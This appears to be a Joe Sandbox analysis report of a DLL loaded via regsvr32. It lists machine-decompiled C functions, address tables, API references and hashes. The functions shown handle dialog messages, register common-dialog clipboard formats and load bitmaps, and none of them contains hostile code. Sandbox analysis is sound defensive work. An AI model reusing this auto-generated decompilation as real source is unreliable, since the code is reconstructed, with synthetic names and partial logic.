                                                                                                                0x10013c35
                                                                                                                0x10013c39
                                                                                                                0x10013c39
                                                                                                                0x10013c3e
                                                                                                                0x10013c41
                                                                                                                0x10013c43
                                                                                                                0x10013c49
                                                                                                                0x10013c4b
                                                                                                                0x10013c4d
                                                                                                                0x10013c52
                                                                                                                0x10013c53
                                                                                                                0x10013c55
                                                                                                                0x10013c55
                                                                                                                0x10013c62
                                                                                                                0x10013c66
                                                                                                                0x10013c66
                                                                                                                0x10013c6e
                                                                                                                0x10013c70
                                                                                                                0x10013c76
                                                                                                                0x10013c78
                                                                                                                0x10013c7b
                                                                                                                0x10013c80
                                                                                                                0x10013c81
                                                                                                                0x10013c83
                                                                                                                0x10013c83
                                                                                                                0x10013c90
                                                                                                                0x10013c94
                                                                                                                0x10013c94
                                                                                                                0x10013c9c
                                                                                                                0x10013ca0
                                                                                                                0x10013ca2
                                                                                                                0x10013ca8
                                                                                                                0x10013caa
                                                                                                                0x10013cac
                                                                                                                0x10013cb1
                                                                                                                0x10013cb2
                                                                                                                0x10013cb4
                                                                                                                0x10013cb4
                                                                                                                0x10013cc1
                                                                                                                0x10013cc5
                                                                                                                0x10013cc5
                                                                                                                0x10013cd1
                                                                                                                0x10013cd3
                                                                                                                0x10013cd9
                                                                                                                0x10013cdb
                                                                                                                0x10013cde
                                                                                                                0x10013ce3
                                                                                                                0x10013ce4
                                                                                                                0x10013ce6
                                                                                                                0x10013ce6
                                                                                                                0x10013cf3
                                                                                                                0x10013cf7
                                                                                                                0x10013cf7
                                                                                                                0x10013d03
                                                                                                                0x10013d05
                                                                                                                0x10013d0b
                                                                                                                0x10013d0d
                                                                                                                0x10013d10
                                                                                                                0x10013d15
                                                                                                                0x10013d16
                                                                                                                0x10013d18
                                                                                                                0x10013d18
                                                                                                                0x10013d20
                                                                                                                0x10013d25
                                                                                                                0x10013d29
                                                                                                                0x10013d29
                                                                                                                0x10013d35
                                                                                                                0x10013d37
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 10013BA3
                                                                                                                • SendMessageA.USER32 ref: 10013BB9
                                                                                                                • SendMessageA.USER32 ref: 10013BCF
                                                                                                                • SendMessageA.USER32 ref: 10013BE5
                                                                                                                • SendMessageA.USER32 ref: 10013BFB
                                                                                                                • SendMessageA.USER32 ref: 10013C0F
                                                                                                                  • Part of subcall function 10020287: __EH_prolog3.LIBCMT ref: 1002028E
                                                                                                                  • Part of subcall function 10020287: __CxxThrowException@8.LIBCMT ref: 100202C4
                                                                                                                • SendMessageA.USER32 ref: 10013D8D
                                                                                                                • SendMessageA.USER32 ref: 10013DD4
                                                                                                                • SendMessageA.USER32 ref: 10013E1B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952110909-0
                                                                                                                • Opcode ID: 157d5ab14b1915a755776daee1e558eafc96f736756881f77cd98053afb0d79f
                                                                                                                • Instruction ID: 370f625acc105a2332efca686d67762992661e93f86ca447c21c6986cb934f32
                                                                                                                • Opcode Fuzzy Hash: 157d5ab14b1915a755776daee1e558eafc96f736756881f77cd98053afb0d79f
                                                                                                                • Instruction Fuzzy Hash: 1FD15275740B02AFE224CF65D892F66B3E5EF48724F00861CF24A9BA91CB74F885CB55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003548B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 127registryclipboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E1003548B(void* __ebx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				signed int* _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;

				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t67);
					_push(0x100172b8);
					_t54 = 0x10070af4;
					_t68 = E1002D69C(__ebx, 0x10070af4, 0, _t67, __eflags);
					__eflags = _t68;
					if(__eflags == 0) {
						E1001729E(__ebx, 0x10070af4, 0, _t68, __eflags);
					}
					__eflags =  *(_t68 + 0x18);
					if(__eflags != 0) {
						__eflags = E10019C3D(_t54, 0, _t68, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t68 + 0x18);
							E1001A7FD( *(_t68 + 0x18), __eflags, _a4);
							 *(_t68 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x10070f10; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t70 = E10019C3D(_t54, 0x110, _t68, __eflags, _a4);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L22;
							}
							_t33 = E1001EFEF(_t70, 0x1005b358);
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x10070f04; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x10070f08; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x10070f00; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x10070f0c; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t70 + 0x15c))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t70 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t70 + 0x1c4; // 0x1c4
									_t66 = _t19;
									 *_t66 = _a16;
									_t31 =  *((intOrPtr*)( *_t70 + 0x160))();
									 *_t66 =  *_t66 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t70 + 0x15c))(_a16);
								goto L26;
							}
							_t40 = E10021B38(_t70);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x10070f00 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x10070f04 = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x10070f08 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x10070f0c = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x10070f10 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x10070f14 = _t46;
						_push(_a12);
						_t31 = E10020C3C(_t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

















                                                                                                                0x1003548b
                                                                                                                0x10035494
                                                                                                                0x1003549d
                                                                                                                0x1003549e
                                                                                                                0x100354a3
                                                                                                                0x100354ad
                                                                                                                0x100354af
                                                                                                                0x100354b1
                                                                                                                0x100354b3
                                                                                                                0x100354b3
                                                                                                                0x100354b8
                                                                                                                0x100354bb
                                                                                                                0x100354c5
                                                                                                                0x100354c7
                                                                                                                0x100354cc
                                                                                                                0x100354cf
                                                                                                                0x100354d4
                                                                                                                0x100354d4
                                                                                                                0x100354c7
                                                                                                                0x100354d7
                                                                                                                0x100354d8
                                                                                                                0x100354e0
                                                                                                                0x100354e2
                                                                                                                0x10035546
                                                                                                                0x10035551
                                                                                                                0x10035613
                                                                                                                0x1003561e
                                                                                                                0x10035626
                                                                                                                0x10035626
                                                                                                                0x00000000
                                                                                                                0x10035626
                                                                                                                0x10035557
                                                                                                                0x10035559
                                                                                                                0x10035567
                                                                                                                0x10035567
                                                                                                                0x1003556d
                                                                                                                0x100355fb
                                                                                                                0x100355fb
                                                                                                                0x00000000
                                                                                                                0x100355fb
                                                                                                                0x1003557b
                                                                                                                0x1003557d
                                                                                                                0x1003557f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10035588
                                                                                                                0x1003558d
                                                                                                                0x1003558f
                                                                                                                0x100355a1
                                                                                                                0x100355a1
                                                                                                                0x100355a7
                                                                                                                0x100355b8
                                                                                                                0x100355be
                                                                                                                0x100355da
                                                                                                                0x100355e0
                                                                                                                0x100355ff
                                                                                                                0x10035605
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003560b
                                                                                                                0x00000000
                                                                                                                0x1003560b
                                                                                                                0x100355e7
                                                                                                                0x100355e7
                                                                                                                0x100355f5
                                                                                                                0x00000000
                                                                                                                0x100355f5
                                                                                                                0x100355c3
                                                                                                                0x100355c3
                                                                                                                0x100355c9
                                                                                                                0x100355cf
                                                                                                                0x100355d5
                                                                                                                0x00000000
                                                                                                                0x100355d5
                                                                                                                0x100355b0
                                                                                                                0x00000000
                                                                                                                0x100355b0
                                                                                                                0x10035593
                                                                                                                0x10035598
                                                                                                                0x1003559f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003559f
                                                                                                                0x1003555b
                                                                                                                0x10035561
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100354e4
                                                                                                                0x100354f6
                                                                                                                0x10035502
                                                                                                                0x1003550e
                                                                                                                0x1003551a
                                                                                                                0x10035526
                                                                                                                0x1003552b
                                                                                                                0x1003552d
                                                                                                                0x10035530
                                                                                                                0x10035535
                                                                                                                0x1003553c
                                                                                                                0x10035627
                                                                                                                0x00000000
                                                                                                                0x10035628
                                                                                                                0x100354e2
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 100354EF
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 100354FB
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 10035507
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 10035513
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_help), ref: 1003551F
                                                                                                                • RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1003552B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipboardFormatRegister
                                                                                                                • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                                • API String ID: 1228543026-3888057576
                                                                                                                • Opcode ID: 17f688779c176c994b3563f396b24f7a16039125b43958598f7d2d1c9b039bb8
                                                                                                                • Instruction ID: c015fbd86c2365627cfa4c6b6d3805c6aa78604190f57317838502c5f4154117
                                                                                                                • Opcode Fuzzy Hash: 17f688779c176c994b3563f396b24f7a16039125b43958598f7d2d1c9b039bb8
                                                                                                                • Instruction Fuzzy Hash: EC418F34500655DFDB22DF20CC999AE3BF1EB44353F114A26F8859B261D736E981CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10013420 Relevance: 22.8, APIs: 15, Instructions: 323windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10013420(void* __ebx, void* __ecx, long _a4) {
				long _v4;
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t119;
				int* _t120;
				int* _t121;
				int* _t125;
				int* _t126;
				int* _t130;
				int* _t131;
				int* _t135;
				int* _t136;
				int* _t140;
				int* _t141;
				long _t145;
				long _t182;
				signed char _t186;
				int* _t190;
				int _t203;
				intOrPtr _t208;
				intOrPtr _t210;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t216;
				signed char _t235;
				signed char _t243;
				void* _t251;
				signed char _t262;
				signed char _t267;
				void* _t272;
				int _t273;
				long _t274;

				_t202 = __ebx;
				_t274 = _a4;
				_t119 =  *(_t274 + 0x18);
				_t272 = __ecx;
				if(( !_t119 & 0x00000001) == 0) {
					__eflags = _t119 & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t274 + 0x14)));
						_push(4);
						E10020287(__ebx, _t251, __ecx, _t274, __eflags);
					}
					_t120 =  *(_t274 + 0x28);
					_t208 =  *((intOrPtr*)(_t274 + 0x2c));
					_t252 =  &(_t120[1]);
					__eflags =  &(_t120[1]) - _t208;
					if( &(_t120[1]) > _t208) {
						__eflags = _t120 - _t208 + 4;
						E1001FADC(_t274, _t252, _t120 - _t208 + 4);
					}
					_t121 =  *(_t274 + 0x28);
					 *(_t274 + 0x28) =  &(_t121[1]);
					SendMessageA( *(_t272 + 0x1f8), 0xf1,  *_t121, 0);
					__eflags =  *(_t274 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t274 + 0x14)));
						_push(4);
						E10020287(_t202, _t252, _t272, _t274, __eflags);
					}
					_t125 =  *(_t274 + 0x28);
					_t210 =  *((intOrPtr*)(_t274 + 0x2c));
					_t253 =  &(_t125[1]);
					__eflags =  &(_t125[1]) - _t210;
					if( &(_t125[1]) > _t210) {
						__eflags = _t125 - _t210 + 4;
						E1001FADC(_t274, _t253, _t125 - _t210 + 4);
					}
					_t126 =  *(_t274 + 0x28);
					 *(_t274 + 0x28) =  &(_t126[1]);
					SendMessageA( *(_t272 + 0x1a4), 0xf1,  *_t126, 0);
					__eflags =  *(_t274 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t274 + 0x14)));
						_push(4);
						E10020287(_t202, _t253, _t272, _t274, __eflags);
					}
					_t130 =  *(_t274 + 0x28);
					_t212 =  *((intOrPtr*)(_t274 + 0x2c));
					_t254 =  &(_t130[1]);
					__eflags =  &(_t130[1]) - _t212;
					if( &(_t130[1]) > _t212) {
						__eflags = _t130 - _t212 + 4;
						E1001FADC(_t274, _t254, _t130 - _t212 + 4);
					}
					_t131 =  *(_t274 + 0x28);
					 *(_t274 + 0x28) =  &(_t131[1]);
					SendMessageA( *(_t272 + 0x150), 0xf1,  *_t131, 0);
					__eflags =  *(_t274 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t274 + 0x14)));
						_push(4);
						E10020287(_t202, _t254, _t272, _t274, __eflags);
					}
					_t135 =  *(_t274 + 0x28);
					_t214 =  *((intOrPtr*)(_t274 + 0x2c));
					_t255 =  &(_t135[1]);
					__eflags =  &(_t135[1]) - _t214;
					if( &(_t135[1]) > _t214) {
						__eflags = _t135 - _t214 + 4;
						E1001FADC(_t274, _t255, _t135 - _t214 + 4);
					}
					_t136 =  *(_t274 + 0x28);
					 *(_t274 + 0x28) =  &(_t136[1]);
					SendMessageA( *(_t272 + 0xfc), 0xf1,  *_t136, 0);
					__eflags =  *(_t274 + 0x18) & 0x00000001;
					if(__eflags == 0) {
						_push( *((intOrPtr*)(_t274 + 0x14)));
						_push(4);
						E10020287(_t202, _t255, _t272, _t274, __eflags);
					}
					_t140 =  *(_t274 + 0x28);
					_t216 =  *((intOrPtr*)(_t274 + 0x2c));
					_t256 =  &(_t140[1]);
					__eflags =  &(_t140[1]) - _t216;
					if( &(_t140[1]) > _t216) {
						__eflags = _t140 - _t216 + 4;
						E1001FADC(_t274, _t256, _t140 - _t216 + 4);
					}
					_t141 =  *(_t274 + 0x28);
					 *(_t274 + 0x28) =  &(_t141[1]);
					SendMessageA( *(_t272 + 0xa8), 0xf1,  *_t141, 0);
					_t145 = SendMessageA( *(_t272 + 0x1f8), 0xf0, 0, 0);
					__eflags = _t145;
					if(_t145 != 0) {
						return _t145;
					} else {
						E1001D39A(_t272 + 0x184, _t145);
						E1001D39A(_t272 + 0x130, 0);
						E1001D39A(_t272 + 0xdc, 0);
						E1001D39A(_t272 + 0x88, 0);
						SendMessageA( *(_t272 + 0x1a4), 0xf1, 0, 0);
						SendMessageA( *(_t272 + 0x150), 0xf1, 0, 0);
						SendMessageA( *(_t272 + 0xfc), 0xf1, 0, 0);
						return SendMessageA( *(_t272 + 0xa8), 0xf1, 0, 0);
					}
				}
				_push(__ebx);
				_v4 = SendMessageA( *(__ecx + 0xa8), 0xf0, 0, 0);
				_v8 = SendMessageA( *(_t272 + 0xfc), 0xf0, 0, 0);
				_a4 = SendMessageA( *(_t272 + 0x150), 0xf0, 0, 0);
				_t203 = SendMessageA( *(_t272 + 0x1a4), 0xf0, 0, 0);
				_t182 = SendMessageA( *(_t272 + 0x1f8), 0xf0, 0, 0);
				_t235 =  !( *(_t274 + 0x18));
				_t280 = _t235 & 0x00000001;
				_t273 = _t182;
				if((_t235 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t274 + 0x14)));
					_push(2);
					E10020287(_t203,  *((intOrPtr*)(_t274 + 0x14)), _t273, _t274, _t280);
				}
				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
					E1001FA65(_t274);
				}
				 *( *(_t274 + 0x28)) = _t273;
				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
				_t262 =  !( *(_t274 + 0x18));
				_t282 = _t262 & 0x00000001;
				if((_t262 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t274 + 0x14)));
					_push(2);
					E10020287(_t203, _t262, _t273, _t274, _t282);
				}
				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
					E1001FA65(_t274);
				}
				_t263 =  *(_t274 + 0x28);
				 *( *(_t274 + 0x28)) = _t203;
				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
				_t186 =  !( *(_t274 + 0x18));
				_t284 = _t186 & 0x00000001;
				if((_t186 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t274 + 0x14)));
					_push(2);
					E10020287(_t203, _t263, _t273, _t274, _t284);
				}
				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
					E1001FA65(_t274);
				}
				 *( *(_t274 + 0x28)) = _a4;
				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
				_t267 =  !( *(_t274 + 0x18));
				_t286 = _t267 & 0x00000001;
				if((_t267 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t274 + 0x14)));
					_push(2);
					E10020287(_t203, _t267, _t273, _t274, _t286);
				}
				if( &(( *(_t274 + 0x28))[1]) >  *((intOrPtr*)(_t274 + 0x2c))) {
					E1001FA65(_t274);
				}
				 *( *(_t274 + 0x28)) = _v8;
				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
				_t243 =  !( *(_t274 + 0x18));
				_t288 = _t243 & 0x00000001;
				if((_t243 & 0x00000001) == 0) {
					_push( *((intOrPtr*)(_t274 + 0x14)));
					_push(2);
					E10020287(_t203,  *((intOrPtr*)(_t274 + 0x14)), _t273, _t274, _t288);
				}
				_t190 =  &(( *(_t274 + 0x28))[1]);
				if(_t190 >  *((intOrPtr*)(_t274 + 0x2c))) {
					_t190 = E1001FA65(_t274);
				}
				 *( *(_t274 + 0x28)) = _v4;
				 *(_t274 + 0x28) =  &(( *(_t274 + 0x28))[1]);
				return _t190;
			}





































                                                                                                                0x10013420
                                                                                                                0x10013425
                                                                                                                0x10013429
                                                                                                                0x1001342d
                                                                                                                0x10013436
                                                                                                                0x100135ad
                                                                                                                0x100135af
                                                                                                                0x100135b4
                                                                                                                0x100135b5
                                                                                                                0x100135b7
                                                                                                                0x100135b7
                                                                                                                0x100135bc
                                                                                                                0x100135bf
                                                                                                                0x100135c2
                                                                                                                0x100135c5
                                                                                                                0x100135c7
                                                                                                                0x100135cb
                                                                                                                0x100135d1
                                                                                                                0x100135d1
                                                                                                                0x100135d6
                                                                                                                0x100135e7
                                                                                                                0x100135f6
                                                                                                                0x100135f8
                                                                                                                0x100135fc
                                                                                                                0x10013601
                                                                                                                0x10013602
                                                                                                                0x10013604
                                                                                                                0x10013604
                                                                                                                0x10013609
                                                                                                                0x1001360c
                                                                                                                0x1001360f
                                                                                                                0x10013612
                                                                                                                0x10013614
                                                                                                                0x10013618
                                                                                                                0x1001361e
                                                                                                                0x1001361e
                                                                                                                0x10013623
                                                                                                                0x1001362e
                                                                                                                0x1001363d
                                                                                                                0x1001363f
                                                                                                                0x10013643
                                                                                                                0x10013648
                                                                                                                0x10013649
                                                                                                                0x1001364b
                                                                                                                0x1001364b
                                                                                                                0x10013650
                                                                                                                0x10013653
                                                                                                                0x10013656
                                                                                                                0x10013659
                                                                                                                0x1001365b
                                                                                                                0x1001365f
                                                                                                                0x10013665
                                                                                                                0x10013665
                                                                                                                0x1001366a
                                                                                                                0x10013675
                                                                                                                0x10013684
                                                                                                                0x10013686
                                                                                                                0x1001368a
                                                                                                                0x1001368f
                                                                                                                0x10013690
                                                                                                                0x10013692
                                                                                                                0x10013692
                                                                                                                0x10013697
                                                                                                                0x1001369a
                                                                                                                0x1001369d
                                                                                                                0x100136a0
                                                                                                                0x100136a2
                                                                                                                0x100136a6
                                                                                                                0x100136ac
                                                                                                                0x100136ac
                                                                                                                0x100136b1
                                                                                                                0x100136bc
                                                                                                                0x100136cb
                                                                                                                0x100136cd
                                                                                                                0x100136d1
                                                                                                                0x100136d6
                                                                                                                0x100136d7
                                                                                                                0x100136d9
                                                                                                                0x100136d9
                                                                                                                0x100136de
                                                                                                                0x100136e1
                                                                                                                0x100136e4
                                                                                                                0x100136e7
                                                                                                                0x100136e9
                                                                                                                0x100136ed
                                                                                                                0x100136f3
                                                                                                                0x100136f3
                                                                                                                0x100136f8
                                                                                                                0x10013703
                                                                                                                0x10013712
                                                                                                                0x10013724
                                                                                                                0x10013726
                                                                                                                0x10013728
                                                                                                                0x100135aa
                                                                                                                0x1001372e
                                                                                                                0x10013735
                                                                                                                0x10013742
                                                                                                                0x1001374f
                                                                                                                0x1001375c
                                                                                                                0x10013771
                                                                                                                0x10013783
                                                                                                                0x10013795
                                                                                                                0x100137af
                                                                                                                0x100137af
                                                                                                                0x10013728
                                                                                                                0x10013448
                                                                                                                0x10013459
                                                                                                                0x1001347b
                                                                                                                0x10013491
                                                                                                                0x1001349b
                                                                                                                0x100134a9
                                                                                                                0x100134ae
                                                                                                                0x100134b0
                                                                                                                0x100134b3
                                                                                                                0x100134b5
                                                                                                                0x100134ba
                                                                                                                0x100134bb
                                                                                                                0x100134bd
                                                                                                                0x100134bd
                                                                                                                0x100134cf
                                                                                                                0x100134d3
                                                                                                                0x100134d3
                                                                                                                0x100134db
                                                                                                                0x100134dd
                                                                                                                0x100134e3
                                                                                                                0x100134e5
                                                                                                                0x100134e8
                                                                                                                0x100134ed
                                                                                                                0x100134ee
                                                                                                                0x100134f0
                                                                                                                0x100134f0
                                                                                                                0x100134fd
                                                                                                                0x10013501
                                                                                                                0x10013501
                                                                                                                0x10013506
                                                                                                                0x10013509
                                                                                                                0x1001350b
                                                                                                                0x10013511
                                                                                                                0x10013513
                                                                                                                0x10013515
                                                                                                                0x1001351a
                                                                                                                0x1001351b
                                                                                                                0x1001351d
                                                                                                                0x1001351d
                                                                                                                0x1001352a
                                                                                                                0x1001352e
                                                                                                                0x1001352e
                                                                                                                0x1001353a
                                                                                                                0x1001353c
                                                                                                                0x10013542
                                                                                                                0x10013544
                                                                                                                0x10013547
                                                                                                                0x1001354c
                                                                                                                0x1001354d
                                                                                                                0x1001354f
                                                                                                                0x1001354f
                                                                                                                0x1001355c
                                                                                                                0x10013560
                                                                                                                0x10013560
                                                                                                                0x1001356c
                                                                                                                0x1001356e
                                                                                                                0x10013574
                                                                                                                0x10013576
                                                                                                                0x10013579
                                                                                                                0x1001357e
                                                                                                                0x1001357f
                                                                                                                0x10013581
                                                                                                                0x10013581
                                                                                                                0x10013589
                                                                                                                0x1001358e
                                                                                                                0x10013592
                                                                                                                0x10013592
                                                                                                                0x1001359e
                                                                                                                0x100135a0
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Exception@8H_prolog3Throw
                                                                                                                • String ID:
                                                                                                                • API String ID: 2952110909-0
                                                                                                                • Opcode ID: 0dd4ed08de290f0c4f048feb9336a23b642ca1fbbea8fc62d2901632797989bf
                                                                                                                • Instruction ID: 34949a1f51b268de1e30d8a8dc99c9b2a9e649bb9d1172762ed38599e44b00d1
                                                                                                                • Opcode Fuzzy Hash: 0dd4ed08de290f0c4f048feb9336a23b642ca1fbbea8fc62d2901632797989bf
                                                                                                                • Instruction Fuzzy Hash: 58B17375740B02AFE324DF65CC92F66B3E5EF48B14F00861CF24A9BA81CA74F8858B55
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10026F51 Relevance: 22.6, APIs: 15, Instructions: 139windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E10026F51(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				void* _t53;
				void* _t56;
				signed int _t63;
				struct HDC__* _t64;
				struct HBITMAP__* _t65;
				struct HDC__* _t69;
				void* _t76;
				struct HDC__* _t79;
				intOrPtr* _t82;
				void* _t91;
				signed int _t92;
				intOrPtr _t100;
				int* _t101;
				int _t102;
				void* _t103;
				BITMAPINFO* _t104;
				void* _t106;

				_t52 = LoadResource(_a4, _a8);
				_v20 = _t52;
				if(_t52 == 0) {
					return _t52;
				}
				_t53 = LockResource(_t52);
				_t76 = _t53;
				_v16 = _t76;
				if(_t76 == 0) {
					L17:
					return _t53;
				}
				_push(_t103);
				_t98 =  *_t76 + 0x40;
				_t53 = E1003B4DA(_t76, _t91,  *_t76 + 0x40, _t103,  *_t76 + 0x40);
				_t104 = _t53;
				if(_t104 == 0) {
					L16:
					goto L17;
				} else {
					E100161B4(_t98, _t104, _t106, _t104, _t98, _t76, _t98);
					_t56 = _t104 + _t104->bmiHeader;
					_a8 = _a8 & 0x00000000;
					_v12 = _t56;
					do {
						_t82 = _t56 + _a8 * 4;
						_t100 =  *_t82;
						_t92 = 0;
						_v8 = _t82;
						while(_t100 !=  *((intOrPtr*)(0x1005c024 + _t92 * 8))) {
							_t92 = _t92 + 1;
							if(_t92 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t101 = 0x1005c028 + _t92 * 8;
							_a4 = GetSysColor( *_t101) & 0x000000ff;
							GetSysColor( *_t101);
							_a4 = _a4 << 8;
							_t63 = GetSysColor( *_t101) >> 0x00000010 & 0x000000ff | _a4;
							__eflags = _t63;
							 *_v8 = _t63;
							_t56 = _v12;
						} else {
							__eflags =  *(0x1005c028 + _t92 * 8) - 0x12;
							if(__eflags != 0) {
								 *_t82 = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t102 = _t104->bmiHeader.biWidth;
					_t79 = _t104->bmiHeader.biHeight;
					_a4 = _t102;
					_a8 = _t79;
					_t64 = GetDC(0);
					_a12 = _t64;
					_t65 = CreateCompatibleBitmap(_t64, _t102, _t79);
					_v8 = _t65;
